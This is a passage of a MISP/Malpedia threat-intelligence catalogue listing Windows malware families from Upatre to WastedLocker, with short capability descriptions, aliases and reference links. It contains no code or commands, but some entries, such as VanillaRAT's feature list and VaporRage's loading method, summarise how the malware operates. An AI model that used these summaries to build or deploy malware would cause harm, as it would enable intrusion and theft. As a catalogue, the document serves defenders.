Upatre is primarly a downloader. It has been discovered in 2013 and since that time it has been widely updated. Upatre is responsible for delivering further malware to the victims, in specific upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.

The tag is: misp-galaxy:malpedia="Upatre"

Upatre is also known as:

Table 4889. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre

https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/

https://secrary.com/ReversingMalware/Upatre/

https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/

https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/

https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/

Urausy

The tag is: misp-galaxy:malpedia="Urausy"

Urausy is also known as:

Table 4890. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy

Uroburos (Windows)

Uroburos is a driver for Windows, including a bypass of PatchGuard. According to Andrzej Dereszowski and Matthieu Kaczmarek, "the techniques used demonstrate [their] excellent knowledge of Windows kernel internals."

The tag is: misp-galaxy:malpedia="Uroburos (Windows)"

Uroburos (Windows) is also known as:

  • Snake

Table 4892. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

https://securelist.com/analysis/publications/65545/the-epic-turla-operation/

https://artemonsecurity.com/uroburos.pdf

https://www.secureworks.com/research/threat-profiles/iron-hunter

https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/

https://exatrack.com/public/Uroburos_EN.pdf

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://www.circl.lu/pub/tr-25/

https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots

https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg

https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified

https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a

https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

https://artemonsecurity.com/snake_whitepaper.pdf

https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken

https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation

USBCulprit

According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

The tag is: misp-galaxy:malpedia="USBCulprit"

USBCulprit is also known as:

Table 4893. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit

https://securelist.com/cycldek-bridging-the-air-gap/97157/

https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view

https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf

Vadokrist

ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.

The tag is: misp-galaxy:malpedia="Vadokrist"

Vadokrist is also known as:

Table 4895. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist

https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf

https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/

vanillarat

Description:

VanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library. Features:

Remote Desktop Viewer (With remote click)
File Browser (Including downloading, drag and drop uploading, and file opening)
Process Manager
Computer Information
Hardware Usage Information (CPU usage, disk usage, available ram)
Message Box Sender
Text To Speech
Screen Locker
Live Keylogger (Also shows current window)
Website Opener
Application Permission Raiser (Normal -> Admin)
Clipboard Text (Copied text)
Chat (Does not allow for client to close form)
Audio Recorder (Microphone)
Process Killer (Task manager, etc.)
Remote Shell
Startup
Security Blacklist (Drag client into list if you don't want connection. Press del. key on client to remove from list)

The tag is: misp-galaxy:malpedia="vanillarat"

vanillarat is also known as:

Table 4899. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vanillarat

https://github.com/DannyTheSloth/VanillaRAT

VaporRage

According to Mandiant, VaporRage or BOOMMIC, is a shellcode downloader written in C that communicates over HTTPS. Shellcode Payloads are retrieved from a hardcoded C2 that uses an encoded host_id generated from the targets domain and account name. BOOMMIC XOR decodes the downloaded shellcode payload in memory and executes it.

The tag is: misp-galaxy:malpedia="VaporRage"

VaporRage is also known as:

  • BOOMMIC

Table 4900. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf

https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58

https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns

Varenyky

In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.

The tag is: misp-galaxy:malpedia="Varenyky"

Varenyky is also known as:

Table 4901. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky

https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/

https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/

Veeam Dumper

Credential Stealer, written in .NET.

The tag is: misp-galaxy:malpedia="Veeam Dumper"

Veeam Dumper is also known as:

  • Eamfo

Table 4903. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.veeam

https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger

VEILEDSIGNAL

The tag is: misp-galaxy:malpedia="VEILEDSIGNAL"

VEILEDSIGNAL is also known as:

Table 4905. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain

Velso

Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension.

The tag is: misp-galaxy:malpedia="Velso"

Velso is also known as:

Table 4906. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.velso

https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/

Vendetta

Ransomware, which appears to be a rebranding of win.cuba.

The tag is: misp-galaxy:malpedia="Vendetta"

Vendetta is also known as:

Table 4907. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta

https://www.malwarebytes.com/blog/threat-intelligence/2023/03/ransomware-review-march-2023

VenomLNK

VenomLNK is the initial phase of the more_eggs malware-as-a-service. It is a poisoned .lnk file that depends on User Execution and points to LOLBINs (often cmd.exe) with additional obfuscated scripting options. This typically initiates WMI abuse and TerraLoader, which can load additional functionality through various plugins.

The tag is: misp-galaxy:malpedia="VenomLNK"

VenomLNK is also known as:

Table 4909. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk

https://www.esentire.com/web-native-pages/unmasking-venom-spider

https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware

https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/

https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire

Venus Locker

The tag is: misp-galaxy:malpedia="Venus Locker"

Venus Locker is also known as:

Table 4910. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker

https://twitter.com/JaromirHorejsi/status/813690129088937984

Vermilion Strike (Windows)

The tag is: misp-galaxy:malpedia="Vermilion Strike (Windows)"

Vermilion Strike (Windows) is also known as:

Table 4911. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike

https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/

Vetta Loader

Vetta Loader is a persistent Loader spreading with infected USB drives. It downloads other components leveraging legit hosting services. https://yoroi.company/wp-content/uploads/2023/12/202311-Vetta-Loader_Def-min.pdf

The tag is: misp-galaxy:malpedia="Vetta Loader"

Vetta Loader is also known as:

Table 4913. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vetta_loader

https://yoroi.company/en/research/unveiling-vetta-loader-a-custom-loader-hitting-italy-and-spread-through-infected-usb-drives/

Vflooder

Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protected by VMProtect.

The tag is: misp-galaxy:malpedia="Vflooder"

Vflooder is also known as:

Table 4914. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder

https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/

VictoryGate

VictoryGate was the name of a cryptomining botnet, which was disrupted by ESET researchers in April 2020. The used malware itself was also referred to as VictoryGate. It was spotted in May 2019 and targeted mainly Latin American users, specifically, Peru (Criptonizando states 90% of the botnet publication residing there). Both public and private sectors were targeted. This cryptojacking malware was specialized in Monero (XRM) cryptocurrency. VictoryGate shows very strong code overlap with win.orchard.

The tag is: misp-galaxy:malpedia="VictoryGate"

VictoryGate is also known as:

Table 4916. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate

https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/

https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/

https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam

https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/

Vidar

Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.

The tag is: misp-galaxy:malpedia="Vidar"

Vidar is also known as:

Table 4917. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif

https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed

https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html

https://www.youtube.com/watch?v=NI_Yw2t9zoo

https://www.secureworks.com/research/the-growing-threat-from-infostealers

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign

https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/

https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google

https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468

https://ke-la.com/information-stealers-a-new-landscape/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/

https://embee-research.ghost.io/ghidra-basics-identifying-and-decoding-encrypted-strings/

https://twitter.com/sisoma2/status/1409816282065743872

https://twitter.com/GroupIB_GIB/status/1570821174736850945

https://blog.jaalma.io/vidar-infostealer-analysis/

https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf

https://xer0xe9.github.io/A-Case-of-Vidar-Infostealer-Part-2/

https://www.youtube.com/watch?v=lxdlNOaHJQA

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://cert.pl/en/posts/2021/10/vidar-campaign/

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://asec.ahnlab.com/en/30445/

https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/

https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing

https://xer0xe9.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/

https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back

https://isc.sans.edu/diary/rss/28468

https://censys.com/tracking-vidar-infrastructure/

https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html

https://eln0ty.github.io/malware%20analysis/vidar/

https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html

https://asec.ahnlab.com/ko/25837/

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-vidar-2c0a62a73087

https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal

https://asec.ahnlab.com/en/22932/

https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/

https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

https://kienmanowar.wordpress.com/2022/12/17/quicknote-vidarstealer-analysis/

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-vidar-stealer

https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/

https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem

https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/

https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd

https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d

https://intel471.com/blog/privateloader-malware

https://threatpost.com/microsoft-help-files-vidar-malware/179078/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

https://www.kroll.com/en/insights/publications/cyber/threat-actors-google-ads-deploy-vidar-stealer

https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

https://asec.ahnlab.com/en/30875/

https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/

VIGILANT CLEANER

Wiper malware discovered by Japanese security firm Mitsui Bussan Secure Directions (MBSD), which is assumed to target Japan, the host country of the 2021 Summer Olympics. In addition to targeting common file Office-related files, it specifically targets file types associated with the Japanese word processor Ichitaro.

The tag is: misp-galaxy:malpedia="VIGILANT CLEANER"

VIGILANT CLEANER is also known as:

  • VIGILANT CHECKER

Table 4918. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner

https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/

https://blog.trendmicro.co.jp/archives/28319

https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/

https://www.mbsd.jp/research/20210721/blog/

https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games

virdetdoor

The tag is: misp-galaxy:malpedia="virdetdoor"

virdetdoor is also known as:

Table 4919. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor

https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks

VIRTUALGATE

The tag is: misp-galaxy:malpedia="VIRTUALGATE"

VIRTUALGATE is also known as:

Table 4921. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate

https://norfolkinfosec.com/some-notes-on-virtualgate/

Vjw0rm

VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).

The tag is: misp-galaxy:malpedia="Vjw0rm"

Vjw0rm is also known as:

Table 4924. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm

https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf

https://community.riskiq.com/article/24759ad2

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://resources.securityscorecard.com/research/acasestudyofVjw0rm#page=1

https://twitter.com/tccontre18/status/1461386178528264204

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://bazaar.abuse.ch/browse/signature/Vjw0rm/

https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf

Vobfus

Malware of this family searches for computers on a network and creates copies of itself in folders with open access. For the program to be activated, the user must first run it on the computer. The code of this malware is written in the Visual Basic programming language and uses obfuscation, which is a distinguishing feature of this family. Code obfuscation complicates attempts by anti-virus software to analyze suspected malware.

The tag is: misp-galaxy:malpedia="Vobfus"

Vobfus is also known as:

  • Beebone

Table 4926. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus

https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/

http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions

Void

Ransomware.

The tag is: misp-galaxy:malpedia="Void"

Void is also known as:

  • VoidCrypt

Table 4928. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.void

https://securelist.com/cis-ransomware/104452/

https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html

Vovalex

Ransomware written in D.

The tag is: misp-galaxy:malpedia="Vovalex"

Vovalex is also known as:

Table 4932. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex

https://twitter.com/VK_Intel/status/1355196321964109824

https://twitter.com/malwrhunterteam/status/1351808079164276736

Vreikstadi

The tag is: misp-galaxy:malpedia="Vreikstadi"

Vreikstadi is also known as:

Table 4933. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi

https://twitter.com/malware_traffic/status/821483557990318080

Vulturi

Information stealer.

The tag is: misp-galaxy:malpedia="Vulturi"

Vulturi is also known as:

Table 4936. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vulturi

https://twitter.com/ViriBack/status/1430604948241276928?s=20

Vyveva RAT

Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.

It uses a simple XOR for encryption of its configuration and network traffic.

It sends detailed information about the victim’s environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.

It supports more than 20 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.

It has MPRD.dll as the internal DLL name, and a single export SamIInitialize.

Vyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.

The tag is: misp-galaxy:malpedia="Vyveva RAT"

Vyveva RAT is also known as:

Table 4937. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva

https://www.welivesecurity.com/2021/04/08/are-you-afreight-dark-watch-out-vyveva-new-lazarus-backdoor/

w32times

The tag is: misp-galaxy:malpedia="w32times"

w32times is also known as:

Table 4938. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times

https://attack.mitre.org/wiki/Group/G0022

win.wabot

Wabot is an IRC worm that is written in Delphi.

The tag is: misp-galaxy:malpedia="win.wabot"

win.wabot is also known as:

Table 4939. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wabot

https://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html

wAgentTea

wAgentTea is an HTTP(S) downloader.

It was deployed mostly against South Korean targets like a pharmaceutical company (Q4 2020) or semiconductor industry (Q2 2023). In several cases, the initial access was obtained via exploitation of South Korean software like Initech’s INISAFE CrossWeb EX or Dream Security’s MagicLine4NX.

It uses AES-128 for encryption and decryption of its network traffic, and for decryption of its binary configuration.

There is a hard-coded list of parameter names used in its HTTP POST request: identy;tname;blogdata;content;thesis;method;bbs;level;maincode;tab;idx;tb;isbn;entry;doc; category;articles;portal

It contains a specific RTTI symbol ".?AVCHttp_socket@@".

The tag is: misp-galaxy:malpedia="wAgentTea"

wAgentTea is also known as:

  • wAgent

Table 4940. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wagenttea

https://asec.ahnlab.com/en/33801/

https://asec.ahnlab.com/wp-content/uploads/2023/10/20231013_Lazarus_OP.Dream_Magic.pdf

https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

WannaCryptor

The tag is: misp-galaxy:malpedia="WannaCryptor"

WannaCryptor is also known as:

  • Wana Decrypt0r

  • WannaCry

  • WannaCrypt

  • Wcry

Table 4942. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today

https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf

http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/

https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/

https://metaswan.github.io/posts/Malware-Lazarus-group’s-Brambul-worm-of-the-former-Wannacry-1

https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf

https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html

https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/

https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf

https://www.youtube.com/watch?v=Q90uZS3taG0

https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58

https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html

https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d

https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/

https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e

https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

https://securelist.com/big-threats-using-code-similarity-part-1/97239/

https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984

http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html

https://sites.temple.edu/care/ci-rw-attacks/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf

https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign

https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf

https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html

https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://swanleesec.github.io/posts/Malware-Lazarus-group’s-Brambul-worm-of-the-former-Wannacry-1

https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/

https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/

WannaHusky

According to Mars, WannaHusky is a Nim-compiled ransomware malware sample, created for demonstration purposes and provided as part of the Practical Malware Analysis & Triage course provided by HuskyHacks.

The tag is: misp-galaxy:malpedia="WannaHusky"

WannaHusky is also known as:

Table 4943. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wannahusky

https://medium.com/@mars0x/wannahusky-malware-analysis-w-yara-ttps-2069fb479909

WannaRen

Ransomware.

The tag is: misp-galaxy:malpedia="WannaRen"

WannaRen is also known as:

Table 4944. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren

https://id-ransomware.blogspot.com/2020/03/wannaren-ransomware.html

WastedLoader

This malware looks similar to WastedLocker, but the ransomware component is missing.

The tag is: misp-galaxy:malpedia="WastedLoader"

WastedLoader is also known as:

Table 4945. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf

WastedLocker

WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.

The tag is: misp-galaxy:malpedia="WastedLocker"

WastedLocker is also known as:

Table 4946. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker

https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/

https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/

https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/

https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf

https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/

https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/

https://www.bbc.com/news/world-us-canada-53195749

https://unit42.paloaltonetworks.com/wastedlocker/

https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf

